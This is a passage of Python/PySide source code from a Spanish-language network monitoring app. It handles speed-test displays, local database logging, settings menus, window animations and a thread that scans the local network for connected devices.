self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color:#D8D8D8; padding: 8px 8px;\")\r\n self.ui.PruebaVelBtn.setText(\"Iniciar\")\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n self.ui.PruebaVelBtn.setEnabled(True)\r\n self.mostrarErrores()\r\n\r\n def putVelocidadT(self):\r\n \r\n now = dt.now()\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{self.inf.SSID}'\")\r\n red=r[0][0]\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n self.ui.Velocidad_Salida.setText(str(self.TrafObj.velocidad[0])+\" Mbps\")\r\n self.ui.Subida_Salida.setText(str(self.TrafObj.velocidad[1])+\" Mbps\")\r\n self.ui.Ping_Salida.setText(str(self.TrafObj.velocidad[4])+ \" ms\")\r\n if subida==0:subida=float(self.TrafObj.velocidad[1])\r\n if bajada==0: bajada=float(self.TrafObj.velocidad[0])\r\n SubidaPor=float(self.TrafObj.velocidad[1])*100/subida\r\n BajadaPor=float(self.TrafObj.velocidad[0])*100/bajada\r\n Porcentaje=(SubidaPor+BajadaPor)/2\r\n Ping=float(self.TrafObj.velocidad[4])\r\n if self.inf.TEMA==\"Obscuro\":\r\n BIEN=\"QFrame{background-color:#282a36; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MEDIO=\"QFrame{background-color:#282a36; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MAL=\"QFrame{background-color:#282a36; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n else:\r\n BIEN=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#02AC66;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MEDIO=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#024A86;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MAL=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#C82A54;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n if SubidaPor>=80: self.ui.Subida_C.setStyleSheet(BIEN)\r\n elif SubidaPor<80 and SubidaPor>=50: self.ui.Subida_C.setStyleSheet(MEDIO)\r\n elif SubidaPor<50: self.ui.Subida_C.setStyleSheet(MAL)\r\n \r\n if BajadaPor>=80: self.ui.Velocidad_C.setStyleSheet(BIEN)\r\n elif BajadaPor<80 and BajadaPor>=50: self.ui.Velocidad_C.setStyleSheet(MEDIO)\r\n elif BajadaPor<50: self.ui.Velocidad_C.setStyleSheet(MAL)\r\n \r\n if Ping<=50: self.ui.Ping_C.setStyleSheet(BIEN)\r\n elif Ping<=100 and BajadaPor>50: self.ui.Ping_C.setStyleSheet(MEDIO)\r\n elif Ping>100: self.ui.Ping_C.setStyleSheet(MAL)\r\n\r\n Estado=\"\"\r\n if Porcentaje>=95:Estado=\"Excelente\"\r\n elif Porcentaje>=70 and Porcentaje<95:Estado=\"Bueno\"\r\n elif Porcentaje>=40 and Porcentaje<70:Estado=\"Regular\"\r\n elif Porcentaje<40:Estado=\"Malo\"\r\n self.ui.SpeedBajada.setText(self.TrafObj.velocidad[2]+\" ms\")\r\n self.ui.SpeedSubida.setText(self.TrafObj.velocidad[3]+\" ms\")\r\n self.ui.SpeedServidor.setText(self.TrafObj.velocidad[5])\r\n self.ui.SpeedSponsor.setText(self.TrafObj.velocidad[6].replace(\"ISP:\",\"\"))\r\n db.insertarPRUEBAS_VELOCIDAD(red,f\"{now.year}-{now.month}-{now.day}\",f\"{now.hour}:{now.minute}\",self.TrafObj.velocidad[5],self.TrafObj.velocidad[6].replace(\"ISP:\",\"\"),float(self.TrafObj.velocidad[1]),float(self.TrafObj.velocidad[0]),float(self.TrafObj.velocidad[2]),self.TrafObj.velocidad[3],float(self.TrafObj.velocidad[4]),Estado)\r\n self.DBPruebas() \r\n def pruebaCompletaVT(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.PruebaVelTBtn.setStyleSheet(\"border-radius:10px;background-color: #1f232a;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PruebaVelTBtn.setStyleSheet(\"border-radius:10px;background-color: #FFFFFF;\tpadding: 8px 8px;\")\r\n self.ui.PruebaVelTBtn.setText(\"Iniciar para todas las redes.(Wi-Fi)\")\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n def putVelocidad(self):\r\n now = dt.now()\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{self.inf.SSID}'\")\r\n red=r[0][0]\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n self.ui.Velocidad_Salida.setText(str(self.velocidad[0])+\" Mbps\")\r\n self.ui.Subida_Salida.setText(str(self.velocidad[1])+\" Mbps\")\r\n self.ui.Ping_Salida.setText(str(self.velocidad[4])+ \" ms\")\r\n if subida==0:subida=float(self.velocidad[1])\r\n if bajada==0: bajada=float(self.velocidad[0])\r\n SubidaPor=float(self.velocidad[1])*100/subida\r\n BajadaPor=float(self.velocidad[0])*100/bajada\r\n Porcentaje=(SubidaPor+BajadaPor)/2\r\n Ping=float(self.velocidad[4])\r\n if self.inf.TEMA==\"Obscuro\":\r\n BIEN=\"QFrame{background-color:#282a36; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MEDIO=\"QFrame{background-color:#282a36; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MAL=\"QFrame{background-color:#282a36; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n else:\r\n BIEN=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MEDIO=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MAL=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n if SubidaPor>=80: self.ui.Subida_C.setStyleSheet(BIEN)\r\n elif SubidaPor<80 and SubidaPor>=50: self.ui.Subida_C.setStyleSheet(MEDIO)\r\n elif SubidaPor<50: self.ui.Subida_C.setStyleSheet(MAL)\r\n \r\n if BajadaPor>=80: self.ui.Velocidad_C.setStyleSheet(BIEN)\r\n elif BajadaPor<80 and BajadaPor>=50: self.ui.Velocidad_C.setStyleSheet(MEDIO)\r\n elif BajadaPor<50: self.ui.Velocidad_C.setStyleSheet(MAL)\r\n \r\n if Ping<=50: self.ui.Ping_C.setStyleSheet(BIEN)\r\n elif Ping<=100 and BajadaPor>50: self.ui.Ping_C.setStyleSheet(MEDIO)\r\n elif Ping>100: self.ui.Ping_C.setStyleSheet(MAL)\r\n\r\n Estado=\"\"\r\n if Porcentaje>=95:Estado=\"Excelente\"\r\n elif Porcentaje>=70 and Porcentaje<95:Estado=\"Bueno\"\r\n elif Porcentaje>=40 and Porcentaje<70:Estado=\"Regular\"\r\n elif Porcentaje<40:Estado=\"Malo\"\r\n self.ui.SpeedBajada.setText(self.velocidad[2]+\" ms\")\r\n self.ui.SpeedSubida.setText(self.velocidad[3]+\" ms\")\r\n self.ui.SpeedServidor.setText(self.velocidad[5])\r\n self.ui.SpeedSponsor.setText(self.velocidad[6].replace(\"ISP:\",\"\"))\r\n db.insertarPRUEBAS_VELOCIDAD(red,f\"{now.year}-{now.month}-{now.day}\",f\"{now.hour}:{now.minute}\",self.velocidad[5],self.velocidad[6].replace(\"ISP:\",\"\"),float(self.velocidad[1]),float(self.velocidad[0]),float(self.velocidad[2]),self.velocidad[3],float(self.velocidad[4]),Estado)\r\n self.DBPruebas()\r\n if self.inf.TEMA==\"Obscuro\": \r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #1f232a;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #FFFFFF;\tpadding: 8px 8px;\")\r\n self.ui.PruebaVelBtn.setText(\"Iniciar\")\r\n self.ui.PruebaVelBtn.setEnabled(True)\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n ##############################################\r\n ## Encabezado\r\n ##############################################\r\n def AplicarConf(self):\r\n aux1=self.ui.Ajus1.itemText(self.ui.Ajus1.currentIndex())\r\n aux2=self.ui.Ajus2.itemText(self.ui.Ajus2.currentIndex())\r\n aux3=self.ui.Ajus3.itemText(self.ui.Ajus3.currentIndex())\r\n aux4=self.ui.Ajus4.text()\r\n aux5=self.ui.Ajus5.text()\r\n file=open(\"modulos/BasesDatos/configuracion.conf\",\"w\",encoding=\"utf-8\")\r\n file.write(f\"{aux1}\\n\")\r\n file.write(f\"{aux2}\\n\")\r\n file.write(f\"{aux3}\\n\")\r\n file.write(f\"{aux4}\\n\")\r\n file.write(f\"{aux5}\")\r\n file.close()\r\n self.inf.SALIR=True\r\n self.TrafObj.Cerrar=True\r\n self.close()\r\n os.execl(sys.executable, \"main.py\", *sys.argv) \r\n\r\n\r\n def mouseDoubleClickEvent(self, event):\r\n widget = self.childAt(event.pos())\r\n if widget is not None and widget.objectName() == \"Encabezado\":\r\n self.Maximizar_Restaurar()\r\n def validarNumero(self,text):\r\n aux=text.text()\r\n try:\r\n float(aux)\r\n except:\r\n text.setText(aux[0:len(aux)-1])\r\n def Cerrar(self):\r\n self.inf.SALIR=True\r\n self.TrafObj.Cerrar=True\r\n self.close()\r\n sys.exit(sys.executable)\r\n def closeEvent(self, event):\r\n self.inf.SALIR=True\r\n self.TrafObj.Cerrar=True\r\n event.accept()\r\n def Minimizar(self):\r\n self.showMinimized()\r\n def Maximizar_Restaurar(self):\r\n status=self.GLOBAL_STATE\r\n if status == False:\r\n self.showMaximized()\r\n self.GLOBAL_STATE = True\r\n self.ui.MaxBtn.setToolTip(\"Restaurar\")\r\n self.ui.MaxBtn.setIcon(QIcon(u\":/Iconos2/Imagenes/icons/icon_maximize.png\"))\r\n else:\r\n self.GLOBAL_STATE = False\r\n self.showNormal()\r\n self.resize(1089, 640)\r\n self.ui.MaxBtn.setToolTip(\"Maximizar\")\r\n self.ui.MaxBtn.setIcon(QIcon(u\":/Iconos2/Imagenes/icons/cil-window-maximize.png\"))\r\n self.ui.SalidaGestion.resizeRowsToContents()\r\n for i in range(0,self.ui.SalidaGestion.columnCount()): self.ui.SalidaGestion.setColumnWidth(i,self.ui.SalidaGestion.width()/self.ui.SalidaGestion.columnCount())\r\n self.ui.TablaVelocidad.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()): self.ui.TablaVelocidad.setColumnWidth(i,self.ui.TablaVelocidad.width()/self.ui.TablaVelocidad.columnCount())\r\n self.ui.TablaPaquetes.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaPaquetes.columnCount()): self.ui.TablaPaquetes.setColumnWidth(i,self.ui.TablaPaquetes.width()/self.ui.TablaPaquetes.columnCount())\r\n self.ui.PINGOUT.resizeRowsToContents()\r\n for i in range(0,self.ui.PINGOUT.columnCount()): self.ui.PINGOUT.setColumnWidth(i,self.ui.PINGOUT.width()/self.ui.PINGOUT.columnCount())\r\n pressing = False\r\n def mousePressEvent(self, event):\r\n widget = self.childAt(event.pos())\r\n if widget is not None and widget.objectName() == \"Encabezado\":\r\n self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()\r\n event.accept()\r\n self.pressing = True\r\n def mouseMoveEvent(self, event):\r\n if self.pressing:\r\n if self.GLOBAL_STATE==True:\r\n self.Maximizar_Restaurar()\r\n self.GLOBAL_STATE==False\r\n self.move( self.dragPosition)\r\n self.move(event.globalPos() - self.dragPosition)\r\n event.accept()\r\n def mouseReleaseEvent(self, QMouseEvent):\r\n self.pressing = False\r\n Side_menu_I=0\r\n def animacion_lateral_Inicio(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"maximumWidth\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p1)\r\n self.animacion.setEndValue(p2)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"minimumWidth\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p1)\r\n self.animacion2.setEndValue(p2)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n \r\n def animacion_lateral_Fin(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"minimumWidth\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p2)\r\n self.animacion.setEndValue(p1)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"maximumWidth\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p2)\r\n self.animacion2.setEndValue(p1)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n def animacion_Vertical_Inicio(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"maximumHeight\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p1)\r\n self.animacion.setEndValue(p2)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"minimumHeight\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p1)\r\n self.animacion2.setEndValue(p2)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n \r\n def animacion_Vertical_Fin(self,p1,p2,t,elemento):\r\n self.animacion = QPropertyAnimation(elemento,b\"minimumHeight\")\r\n self.animacion.setDuration(t)\r\n self.animacion.setStartValue(p2)\r\n self.animacion.setEndValue(p1)\r\n self.animacion.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion.start()\r\n \r\n self.animacion2 = QPropertyAnimation(elemento,b\"maximumHeight\")\r\n self.animacion2.setDuration(t)\r\n self.animacion2.setStartValue(p2)\r\n self.animacion2.setEndValue(p1)\r\n self.animacion2.setEasingCurve(QEasingCurve.InOutQuart)\r\n self.animacion2.start()\r\n def Menu_Izquierdo(self):\r\n if self.Side_menu_I==0:\r\n self.animacion_lateral_Inicio(45,145,500,self.ui.MenuIzquierdo)\r\n self.Side_menu_I=1\r\n else:\r\n self.animacion_lateral_Fin(45,145,500,self.ui.MenuIzquierdo)\r\n self.Side_menu_I=0\r\n def cerrar_MenuC(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#FFFFFF;}QPushButton::pressed{background-color:#FFFFFF;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.animacion_lateral_Fin(0,230,500,self.ui.MenuCentral)\r\n self.Side_menu_A=0\r\n Side_menu_H=0 \r\n def Ayuda(self):\r\n if self.Side_menu_H==0 and self.Side_menu_A == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAyu) \r\n self.animacion_lateral_Inicio(0,300,500,self.ui.MenuCentral)\r\n self.ui.label.setText(\"Ayuda\")\r\n self.Side_menu_H=1\r\n os.system(\"START modulos/BasesDatos/Manual.pdf\")\r\n\r\n elif self.Side_menu_A == 1 and self.Side_menu_H == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAyu) \r\n self.Side_menu_A=0\r\n self.Side_menu_H=1\r\n self.ui.label.setText(\"Ayuda\")\r\n os.system(\"START modulos/BasesDatos/Manual.pdf\")\r\n\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.animacion_lateral_Fin(0,300,500,self.ui.MenuCentral)\r\n self.Side_menu_H=0\r\n Side_menu_A=0 \r\n def menuAjus(self):\r\n aux=open(\"modulos/BasesDatos/configuracion.conf\",\"r\",encoding=\"utf-8\")\r\n contenido=aux.readlines()\r\n self.inf.VENTANA=contenido[0].replace(\"\\n\",\"\")\r\n self.inf.TEMA=contenido[1].replace(\"\\n\",\"\")\r\n self.inf.DETECCION=contenido[2].replace(\"\\n\",\"\")\r\n self.inf.TIEMPO_DETECCION=float(contenido[3].replace(\"\\n\",\"\"))\r\n self.inf.TIEMPO_PAQ=float(contenido[4].replace(\"\\n\",\"\"))\r\n aux.close()\r\n self.ui.Ajus1.clear()\r\n if self.inf.VENTANA==\"Propia del Software\":\r\n self.ui.Ajus1.addItem(\"Propia del Software\")\r\n self.ui.Ajus1.addItem(\"Propia del SO\")\r\n else:\r\n self.ui.Ajus1.addItem(\"Propia del SO\")\r\n self.ui.Ajus1.addItem(\"Propia del Software\")\r\n self.ui.Ajus2.clear()\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.Ajus2.addItem(\"Obscuro\")\r\n self.ui.Ajus2.addItem(\"Claro\")\r\n else:\r\n self.ui.Ajus2.addItem(\"Claro\")\r\n self.ui.Ajus2.addItem(\"Obscuro\")\r\n self.ui.Ajus3.clear()\r\n if self.inf.DETECCION==\"Preciso (ARP y Ping)\":\r\n self.ui.Ajus3.addItem(\"Preciso (ARP y Ping)\")\r\n self.ui.Ajus3.addItem(\"Rápido (Solo ARP)\")\r\n else:\r\n self.ui.Ajus3.addItem(\"Rápido (Solo ARP)\")\r\n self.ui.Ajus3.addItem(\"Preciso (ARP y Ping)\")\r\n self.ui.Ajus4.setText(str(self.inf.TIEMPO_DETECCION))\r\n self.ui.Ajus5.setText(str(self.inf.TIEMPO_PAQ))\r\n def Ajustes(self):\r\n if self.Side_menu_A==0 and self.Side_menu_H == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAjus) \r\n self.animacion_lateral_Inicio(0,300,500,self.ui.MenuCentral)\r\n \r\n self.Side_menu_A=1\r\n self.ui.BarDis.clear()\r\n self.menuAjus()\r\n self.ui.label.setText(\"Ajustes\")\r\n elif self.Side_menu_H == 1 and self.Side_menu_A == 0:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n style=\"QPushButton{background-color:#1f232a; text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.ContenidoCentral.setCurrentWidget(self.ui.pAjus)\r\n self.Side_menu_H=0\r\n self.Side_menu_A=1\r\n self.ui.label.setText(\"Ajustes\")\r\n self.menuAjus()\r\n\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AjustesBtn.setStyleSheet(style)\r\n self.ui.AyudaBtn.setStyleSheet(style)\r\n self.animacion_lateral_Fin(0,300,500,self.ui.MenuCentral)\r\n self.Side_menu_A=0\r\n \r\n Side_menu_D=0 \r\n def Usuarios(self):\r\n if self.Side_menu_D==0 and self.Side_menu_US == 0:\r\n self.ui.label_2.setText(\"Usuarios Dentro de la Red\")\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pUse) \r\n self.animacion_lateral_Inicio(0,320,500,self.ui.MenuDerecho)\r\n\r\n self.Side_menu_D=1\r\n \r\n\r\n elif self.Side_menu_US == 1 and self.Side_menu_D == 0:\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pUse)\r\n self.Side_menu_D=1\r\n self.Side_menu_US=0\r\n \r\n else:\r\n self.animacion_lateral_Fin(0,320,500,self.ui.MenuDerecho)\r\n self.Side_menu_D=0\r\n def hilo_usuarios(self):\r\n while self.inf.SALIR!=True:\r\n if self.inf.CONEXION==True:\r\n try:\r\n if self.inf.CAMBIOS == False:\r\n self.NUM,dispositivos,ips_arp=rs.escanearARP(self.inf.GATEWAY+\"/24\",self.inf.INTERFAZ)\r\n aux=self.inf.GATEWAY.split(\".\")\r\n GATEWAY_PING=aux[0]+\".\"+aux[1]+\".\"+aux[2]+\".0/24\"\r\n if self.inf.SALIR==True: break\r\n if self.inf.DETECCION==\"Preciso (ARP y Ping)\":\r\n if self.inf.CAMBIOS == False:\r\n ips_ping=rs.pingda(GATEWAY_PING,ips_arp,self.inf)\r\n if self.inf.SALIR==True: break\r\n if self.inf.CAMBIOS == False:\r\n disposi=rs.ping_arp(ips_ping, ips_arp,dispositivos,self.inf.INTERFAZ)\r\n if self.inf.SALIR==True: break\r\n else:\r\n disposi=dispositivos\r\n if self.inf.CAMBIOS == False:\r\n self.NUM,self.dispo=rs.obtener_datos_Dispositivo(disposi,self.inf.INTERFAZ,self.inf)\r\n if self.inf.SALIR==True: break\r\n if self.inf.CAMBIOS == False:\r\n self.signalUser.emit(1)\r\n self.inf.CAMBIOS=False\r\n self.mostrarErrores()\r\n sleep(self.inf.TIEMPO_DETECCION)\r\n except Exception as e:\r\n print(f\"[!] Error:{e}\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Error de Aplicación\",\"Se detecto el error\"+str(type(e))])\r\n sleep(10)\r\n else:\r\n sleep(1)\r\n def UsuariosDisp(self):\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(\"

Existen \"+str(self.NUM)+\" dispositivos conectados.

\"))\r\n for NE in self.dispo:\r\n aux=UsuariosClass(NE,self.inf.TEMA,self.inf)\r\n disp.addWidget(aux) \r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea_2.setWidget(aux2)\r\n try:\r\n ID=int(db.consultar(f\"SELECT ID_RED FROM RED WHERE SSID='{self.inf.SSID}'\")[0][0])\r\n val=db.consultar(f\"SELECT count(*) FROM CONTROL_RED_ESPECIFICA WHERE ID_RED={ID}\")[0][0]\r\n self.ui.UserBtn.setText(f\" {self.NUM} / {str(int(val))}\")\r\n except:\r\n print(\"[!] Error al actualizar usuarios.\")\r\n self.ui.UserBtn.setText(\"\")\r\n Side_menu_US=0\r\n def Dipositivos(self):\r\n if self.Side_menu_US==0 and self.Side_menu_D == 0:\r\n #self.ui.SalidaARP.setHtml(\"asasd\")\r\n self.ui.label_2.setText(\"Interfaces de red\")\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pDisp) \r\n self.animacion_lateral_Inicio(0,320,500,self.ui.MenuDerecho)\r\n self.DispositivosFrame()\r\n self.Side_menu_US=1\r\n elif self.Side_menu_D == 1 and self.Side_menu_US == 0:\r\n self.ui.ContenidoDerecho.setCurrentWidget(self.ui.pDisp)\r\n self.DispositivosFrame()\r\n self.Side_menu_D=0\r\n self.Side_menu_US=1\r\n else:\r\n self.animacion_lateral_Fin(0,320,500,self.ui.MenuDerecho)\r\n self.Side_menu_US=0\r\n def DispositivosFrame(self):\r\n disp = QVBoxLayout()\r\n INTER=rs.Obtener_Dispositivos(True)\r\n for IN in INTER:\r\n aux=DispositivosClass(IN,self.inf.TEMA,self.inf)\r\n disp.addWidget(aux) \r\n aux=QWidget()\r\n aux.setLayout(disp)\r\n aux.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea.setWidget(aux)\r\n def cerrar_MenuD(self):\r\n self.animacion_lateral_Fin(0,320,500,self.ui.MenuDerecho)\r\n self.Side_menu_US=0\r\n Side_menu_AL=0 \r\n def Alerta(self):\r\n self.formato(self.ui.AlertasBtn)\r\n if self.Side_menu_AL==0:\r\n self.animacion_Vertical_Inicio(0,200,500,self.ui.Notificacion)\r\n self.Side_menu_AL=1\r\n else:\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AlertasBtn.setStyleSheet(style)\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.Notificacion)\r\n self.Side_menu_AL=0\r\n self.errores()\r\n def cerrar_MenuN(self):\r\n style=\"QPushButton{text-align:left;\tpadding:5px 10px;\tborder-top-left-radius: 10px;\tborder-bottom-left-radius: 10px;} QPushButton::hover{background-color:#1f232a;}QPushButton::pressed{background-color:#343b47;}\"\r\n self.ui.AlertasBtn.setStyleSheet(style)\r\n self.animacion_Vertical_Fin(0,200,500,self.ui.Notificacion)\r\n self.Side_menu_AL=0\r\n def Velocidad(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.VelocidadBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pVel) \r\n self.DBPruebas()\r\n self.ui.TablaVelocidad.resizeRowsToContents()\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()): self.ui.TablaVelocidad.setColumnWidth(i,self.ui.TablaVelocidad.width()/self.ui.TablaVelocidad.columnCount())\r\n def DashBoard(self):\r\n self.BorrarFormatos()\r\n self.formato(self.ui.DashboardBtn)\r\n self.ui.Contenidos.setCurrentWidget(self.ui.pTab)\r\n self.actualizarDatosDash() \r\n self.crearTablas()\r\n senalS=Signal(int)\r\n def senal(self):\r\n while self.inf.SALIR!=True:\r\n self.senalS.emit(1)\r\n sleep(5)\r\n def PromedioVel(self):\r\n pr=db.consultarPRUEBAS_VELOCIDAD()\r\n datos=[]\r\n fechav=\"\"\r\n cont=0\r\n for i in pr:\r\n if self.inf.SSID==i[5]:\r\n if fechav!=i[1]:\r\n datos.append([i[1],i[6],i[7]])\r\n cont+=1\r\n else:\r\n datos[cont-1][1]=(datos[cont-1][1]+i[6])/2\r\n datos[cont-1][2]=(datos[cont-1][2]+i[7])/2\r\n fechav=i[1]\r\n return datos\r\n def crearTablas(self):\r\n self.crearGraficaVel()\r\n self.crearGraficaUser()\r\n self.pendientes()\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(f\"

Buscando Dispositivos en {self.inf.SSID}...

\")) \r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea_2.setWidget(aux2)\r\n def pendientes(self):\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(\"

Pendientes

